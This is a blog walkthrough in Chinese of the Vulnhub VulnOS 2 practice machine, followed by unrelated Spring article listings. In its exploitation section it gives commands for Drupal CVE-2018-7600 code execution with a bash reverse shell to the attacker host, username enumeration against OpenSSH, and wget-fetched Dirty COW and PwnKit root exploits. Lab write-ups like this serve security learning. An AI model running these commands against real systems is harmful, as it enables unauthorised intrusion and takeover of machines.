Vulnhub靶机:VulnOS2

最新推荐文章于 2025-02-19 14:08:50 发布
最新推荐文章于 2025-02-19 14:08:50 发布
阅读量598 收藏 5
点赞数 5
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_48904485/article/details/136891620
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.4)

靶机:VulnOS: 2(10.0.2.14)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/vulnos-2,147/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.14

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80、6667

nmap -A 10.0.2.14 -p 1-65535

在这里插入图片描述

**22端口:**根据nmap扫描结果,22端口安装OpenSSH 6.6.1p1,该版本存在用户名枚举漏洞

在这里插入图片描述

下载exp,枚举用户名

python cve-2018-15473-1.py --port 22 --userList ../../user.txt 10.0.2.14

在这里插入图片描述

**80端口:**打开网站未发现什么功能点,查看源码也没有发现什么隐藏信息

在这里插入图片描述

使用gobuster和dirbuster工具进行目录爆破,发现一个目录/jabc/

gobuster dir -u http://10.0.2.14 -x txt,php,html,bak,sql,xml --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

在这里插入图片描述

访问/jabc/目录

在这里插入图片描述

使用droopescan工具判断网站的CMS,结果为drupal 7.2

droopescan scan -u http://10.0.2.14/jabc/

在这里插入图片描述

三、漏洞利用

使用searchsploit搜索drupal 7.2的历史漏洞

在这里插入图片描述

searchsploit搜索的exp有点问题,直接在github找一个exp:CVE-2018-7600

python CVE-2018-7600.py http://10.0.2.14/jabc/ -c 'id'

在这里插入图片描述

反弹shell

python CVE-2018-7600.py http://10.0.2.14/jabc/ -c '''bash -c "bash -i >& /dev/tcp/10.0.2.4/4444 0>&1"'''

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

使用命令uname -a查看系统的内核版本,为Linux VulnOSv2 3.13.0-24-generic

使用cat /etc/*-release命令查看靶机的发行版本为:Ubuntu 14.04.4 LTS

并且靶机存在gcc环境

在这里插入图片描述

使用经典的脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

将exp下载下来,使用web服务上传到靶机,并编译执行,该exp会在/etc/passwd文件写入一个具有root权限的用户:firefart

cd /tmp
wget http://10.0.2.4/CVE-2016-5195.c
gcc -pthread CVE-2016-5195.c -o CVE-2016-5195 -lcrypt
./CVE-2016-5195

在这里插入图片描述

虚拟机直接崩溃,重启一下就好了

在这里插入图片描述

使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现存在/usr/lib/policykit-1/polkit-agent-helper-1,该版本的polkit存在提权漏洞:CVE-2021-4034

在这里插入图片描述

使用web服务器将exp上传到靶机,编译执行,得到root权限

cd /tmp
wget http://10.0.2.4/CVE-2021-4034.c
gcc CVE-2021-4034.c -o CVE-2021-4034
./CVE-2021-4034

在这里插入图片描述

获取flag

在这里插入图片描述

spring security原理和机制 | Spring Boot 35
学Java,找哪吒
06-25 5万+
一、SpringSecurity 框架简介 Spring 是非常流行和成功的 Java 应用开发框架Spring Security 正是 Spring 家族中的 成员。Spring Security 基于 Spring 框架,提供了一套 Web 应用安全性的完整解决方 案。 正如你可能知道的关于安全方面的两个主要区域是“认证”和“授权”(或者访问控 制),一般来说,Web 应用的安全性包括用户认证(Authentication)和用户授权 (Authorization)两个部分,这两点也是 Spring
Spring 生态系统概述(2024最新)
宋志辉的博客
03-27 759
Spring 生态系统是一个庞大且不断发展的框架和工具集合,旨在简化和加速 Java 应用程序的开发。它由一系列相互关联的项目组成,每个项目都专注于特定的功能领域。
剖析spring生态系统
乐于学习、乐于分享、乐于总结
05-06 3921
Spring为开发者提供了一个一站式的轻量级应用开发平台,提供给开发者多种的技术选择。当然Spring还有许多值得注意的子项目,了解这些子项目,可以更好地使用Spirng或理解其设计架构和思想。下面将介绍Spring整个生态系统情况: Spring Framework(Core): Spring的核心项目,其中包含了一系列的IOC容器的设计,提供了依赖注入的实现;同时,还集成了AOP,
Spring
最新发布
weixin_67281023的博客
02-19 1292
包含spring核心容器、ioc思想、bean的使用、aop切面编程和事务的讲解
Spring生态简介
weixin_30399871的博客
06-01 408
目录 概述 项目说明 主要项目 社区项目 保留项目 最后总结 概述 做Java开发的人一提起Spring,首先在脑海中浮现出的就是“IoC”,“AOP”,“Spring MVC”,“Spring Security”等等这些名词,甚至大有“无Spring不Java”的感慨。 实际上,时至今日Spring已不再是一个简单的编程框架了,从最初的“SSH框架”发展到今天,Struts和Hibern...
你必须了解Spring生态
weixin_34242331的博客
08-13 251
Spring不止是提供了IOC、AOP的功能,还提供了大量的基于Spring的项目,拿来用就行了,用于一站式开发,大大降低了开发的难度。 下面列举下主要的一些Spring生态项目: Spring Boot:一站式快速开发解决项目。 Spring Cloud:提供对分布式系统的...
Spring生态系统Spring可能大家都在用,很少去关注整体架构)
向小凯同学学习
03-22 3298
Spring的整体架构 1、Spring框架至今已集成了20多个模块。这些模块主要被分如下图所示的核心容器、数据访问/集成,、Web、AOP(面向切面编程)、工具、消息和测试模块[5]: 2、Core Container 核心容器 核心部分分为4大块,spring-core, spring-beans, spring-context, spring-expression. 其中core和...
微服务架构 Spring Cloud 生态快速回顾指南
热门推荐
张彦峰的博客
02-14 167万+
本文介绍了Spring Cloud在微服务架构中的核心组件及其应用。Spring Cloud提供了服务注册与发现、负载均衡、配置管理和容错机制等功能,简化了分布式系统的构建与管理。通过对这些组件的分析,本文阐述了如何利用Spring Cloud提高微服务系统的可用性、灵活性和可扩展性。最终,本文强调了Spring Cloud作为现代云原生应用开发的重要工具,帮助开发者构建高效、可靠的微服务架构。
基于 Spring Boot 生态的 Pear Admin Boot 设计源码
10-05
基于Spring Boot生态的Pear Admin Boot设计源码是一个全面整合的开发平台,它依托于Spring Boot强大的生态系统,将权限管理与工作流处理功能集于一体。通过整合众多技术栈,包括JavaScript、Java、HTML、CSS等,它为...
基于SpringCloud生态圈的GrainMall网上商城设计源码
02-07
在这个项目中,SpringCloud不仅处理了服务发现、配置管理、负载均衡等关键功能,还通过Eureka、Config Server、Zuul、Hystrix和Feign等组件,为整个商城系统提供了弹性和容错能力。 Java作为服务端编程语言,在该...
Spring 生态
weixin_34133829的博客
07-24 490
为什么80%的码农都做不了架构师?>>> ...
spring模块及生态支持汇总
weixiaomao0801的博客
12-04 1317
基于spring4.x阶段介绍spring生态: 请输入图片描述 1.Spring模块 (1)核心容器 Spring-Core:核心工具类,Spring其他模块大量使用Spring-Core Spring-Bean:Spring定义Bean的支持 Spring-Context:运行时Spring容器 Spring-Conte
Spring生态圈、Spring全家桶
阿飞的博客
11-10 3300
Springboot是伴随spring4诞生的,除了springboot之外,spring作为企业级应用开发的轻量级解决方案提供了许多子项目;这些子项目可以更好地理解其设计架构、思想并使用springspring整个生态系统包括以下内容。 1. Spring Framework(Core) Spring的核心项目,其中包含了一系列IoC容器的设计,提供了依赖注入的实现,同时,还集成了AOP,提供了面向切面编程的实现;当然还有MVC、JDBC、事务处理模块的实现。 2. Spring boot 提供了快速
Spring生态
cichun9748的博客
08-30 137
Spring不止是提供了IOC、AOP的功能,还提供了大量的基于Spring的项目,拿来用就行了,用于一站式开发,大大降低了开发的难度。 下面列举下主要的一些Spring生态项目: Spring Boot:一站式快速开发解决项目。 Spring Cloud:提供对分布...
Spring生态详解 】
u012632105的博客
04-29 237
Spring不止AOP与IOC:Spring生态详解
spring生态
07-30 281
springframework(spring,springMVC)->springboot(简化配置)->springcloud(分布式)spring5引入响应式编程(reactive)
Spring生态
weixin_33725239的博客
02-26 549
2019独角兽企业重金招聘Python工程师标准>>> ...
Spring生态系统的组件
06-14
Spring是一个非常流行的Java应用程序框架,它有着非常丰富的生态系统。以下是一些Spring生态系统的组件: 1. Spring Framework:是整个Spring生态系统的核心,提供了一系列的工具和框架,用于构建企业级应用程序。 2. Spring Boot:是Spring的快速应用程序开发框架,提供了一些默认配置和快速开发的工具,让开发者能够更加快速地构建Spring应用程序。 3. Spring Cloud:提供了一系列的工具和框架,用于构建分布式系统的微服务架构。 4. Spring Data:提供了一组框架和库,用于简化和改进与不同数据存储的交互。 5. Spring Security:提供了一组框架和库,用于保护您的应用程序,包括身份验证、授权、攻击防御等。 6. Spring Batch:提供了一个轻量级的批处理框架,简化了批处理应用程序的开发和部署。 7. Spring Integration:提供了一组框架和库,用于构建基于消息的应用程序。 8. Spring MVC:提供了一组框架和库,用于构建Web应用程序。 9. Spring WebFlux:提供了一组框架和库,用于构建反应式Web应用程序。 10. Spring Test:提供了一组工具和库,用于编写和运行Spring集成测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值